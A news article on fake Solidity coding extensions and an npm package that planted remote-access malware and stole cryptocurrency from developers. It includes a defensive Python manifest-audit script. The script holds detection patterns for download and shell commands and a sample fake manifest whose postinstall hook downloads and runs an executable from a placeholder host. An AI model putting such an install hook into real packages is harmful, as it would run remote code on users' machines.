Malicious code found in fake coding extensions used to steal crypto – Crypto News

Security researchers have found open-source packages targeting developers with malware that steals cryptocurrency. The packages were hosted on the Open VSX repository disguised as tools for working with Solidity, a programming language used in blockchain development. They delivered malware that gave attackers control over victims’ devices and access to sensitive data.

The packages were meant to work with Cursor, a development environment based on Visual Studio Code. Cursor is often used for AI-assisted coding, making it a natural target for attackers looking to reach developers.

Kaspersky’s Global Research and Analysis Team uncovered the issue after a Russian blockchain developer reported an incident. The developer had installed what looked like a regular Solidity extension. Instead, it gave hackers access to his computer. They used that access to steal around $500,000 in cryptocurrency.

The attackers made their fake extension look more trustworthy, and ranked it higher in the repository’s search results, by spoofing its download numbers, pegging it at 54,000 installs. Once installed, the extension did nothing useful. Instead, it installed ScreenConnect, a remote access tool that gave the attackers full control of the machine.

From there, the attackers deployed Quasar, an open-source backdoor, along with a stealer tool. The combination collected data from the victim’s web browsers, email apps, and cryptocurrency wallets, including wallet seed phrases – critical information that allowed the attackers to drain accounts.

Once the original malicious extension was taken down, the attacker reuploaded it and faked more installs – this time claiming two million downloads (the real version of the extension had around 61,000 downloads by comparison). Kaspersky has flagged the fake version again for removal.

Georgy Kucherin, a researcher at Kaspersky, said these kinds of attacks are getting harder to spot. Even experienced developers who understand cybersecurity risks can fall for them, especially in fields like blockchain.

In addition to the fake Solidity extension, the attacker uploaded a malicious NPM package called solsafe, which also delivered ScreenConnect. A few months before that, three other harmful Visual Studio Code extensions – solaibot, among-eth, and blankebesxstnion – were uploaded to the same repository. Those have since been removed.
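Both delivery paths described above (an editor extension and an npm package whose install step pulls in a remote access tool) describe themselves in a package.json manifest, which is the natural place for a first triage check. The script below is an added example and is not Kaspersky's tooling or code from any of the packages named in this article; the two sample manifests, the package and publisher names in them, the `example.invalid` host and the heuristic pattern list are all constructed for illustration.

```python
import json
import re
from typing import List, Optional

# npm lifecycle hooks that run automatically during `npm install` (real npm field names).
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic patterns constructed for this example: commands in an install hook that
# download something remote, spawn a shell, or reference a dropped executable.
RISKY_PATTERNS = [
    (r"\b(curl|wget|invoke-webrequest|iwr|certutil|bitsadmin)\b", "remote download in install hook"),
    (r"\bpowershell\b|\bcmd(\.exe)?\s+/c\b", "shell spawned from install hook"),
    (r"\bnode\s+-e\b", "inline JavaScript executed from install hook"),
    (r"base64|-encodedcommand|\s-enc\b", "encoded payload in install hook"),
    (r"\.(exe|msi|ps1|vbs|bat)\b", "executable or script artifact referenced in install hook"),
]


def audit_manifest(manifest: dict, expected_publisher: Optional[str] = None) -> List[str]:
    """Return human-readable findings for a package.json-style manifest.

    Works for npm packages and for VS Code / Open VSX extensions, since both use
    package.json. An empty list means nothing was flagged, not that the package
    is safe: this is a triage heuristic, not a verdict.
    """
    findings: List[str] = []
    name = manifest.get("name", "<unnamed>")

    # 1. Publisher identity: a lookalike lives in a different publisher namespace
    #    than the extension it imitates, even when the display name is identical.
    publisher = manifest.get("publisher")
    if expected_publisher is not None and publisher != expected_publisher:
        findings.append(
            f"{name}: publisher {publisher!r} does not match expected {expected_publisher!r}"
        )

    # 2. Install-time hooks: code that runs before the user has opened anything.
    scripts = manifest.get("scripts") or {}
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        for pattern, reason in RISKY_PATTERNS:
            if re.search(pattern, command, re.IGNORECASE):
                findings.append(f"{name}: {hook} -> {reason}: {command!r}")

    # 3. An extension that activates on every editor start runs code the moment
    #    the editor opens, which is worth a second look for a small utility.
    if manifest.get("activationEvents") == ["*"]:
        findings.append(f"{name}: activates on every editor start (activationEvents ['*'])")

    return findings


def audit_manifest_json(text: str, expected_publisher: Optional[str] = None) -> List[str]:
    """Same check, starting from the raw package.json text."""
    return audit_manifest(json.loads(text), expected_publisher)


# Constructed sample manifests (not real packages): one plausible extension and one
# lookalike whose postinstall fetches and runs a binary from a placeholder host.
BENIGN_MANIFEST = {
    "name": "solidity-helper-sample",
    "publisher": "ExamplePublisher",
    "version": "1.2.0",
    "main": "./out/extension.js",
    "activationEvents": ["onLanguage:solidity"],
    "scripts": {"compile": "tsc -p ./", "postinstall": "node ./scripts/check-node-version.js"},
}

LOOKALIKE_MANIFEST = {
    "name": "solidity-helper-sample",
    "publisher": "ExamplePublisher-Official",
    "version": "1.2.1",
    "main": "./out/extension.js",
    "activationEvents": ["*"],
    "scripts": {"postinstall": "curl -s http://example.invalid/setup.exe -o setup.exe && setup.exe"},
}

if __name__ == "__main__":
    for m in (BENIGN_MANIFEST, LOOKALIKE_MANIFEST):
        results = audit_manifest(m, expected_publisher="ExamplePublisher")
        print(f"{m['name']} ({m['publisher']}): {len(results)} finding(s)")
        for line in results:
            print("  -", line)
```

Run against the two samples, the benign manifest produces no findings while the lookalike produces four: the publisher mismatch, the remote download and the dropped executable in its postinstall hook, and activation on every editor start. The publisher comparison is the check that would have separated the fake Solidity extension from the real one regardless of its spoofed install count, since the count is marketplace metadata the attacker controlled but the publisher namespace is not.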

The attacks highlight how public code repositories are a growing threat vector, especially for developers working in sensitive fields like cryptocurrencies. Malicious packages disguised as helpful tools are proving to be a simple but effective way for attackers to gain access to high-value targets.
